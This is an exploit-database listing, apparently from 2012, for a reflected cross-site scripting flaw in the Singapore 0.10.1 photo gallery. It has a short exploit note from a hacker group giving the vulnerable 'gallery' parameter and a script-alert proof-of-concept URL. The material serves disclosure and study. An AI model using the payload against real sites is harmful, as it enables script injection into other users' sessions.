Singapore 0.10.1 Cross Site Scripting

2012.03.12

Credit: T0x!c

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

#### # Exploit Title: singapore 0.10.1 Remote XSS Vulnerabilities
# Author: T0x!c
# Facebook Page: www.facebook.com/DzTem
# E-mail: Malik_99@hotmail.fr
# Category:: webapps
# Google Dork:[ OFF ]
# Software : http://sourceforge.net/projects/singapore/
# Version: 0.10.1
# Tested on: || Windows ||
####
# +----+ xXx < Greetings to 'KedAns-Dz' > xXx +----+
===[ Exploit XSS ]===
+> http://www.site.com/patch/index.php?gallery=[XSS]
+> http://www.site.com/patch/index.php?gallery=<script>alert('31337')</script>
# (^_^) ! Good Luck ALL ...
=================================**AlgeriansHackers**==================================
# Greets To : KedAns-Dz * Caddy-Dz * Kha&miX * Jago-dz * Amine Msd * Kalashinkov *
(exploit-id.com) , (1337day.com) , (dis9.com) , (Dz-Team.biz)
=======================================================================================

References:

http://sourceforge.net/projects/singapore/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Singapore 0.10.1 Cross Site Scripting

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.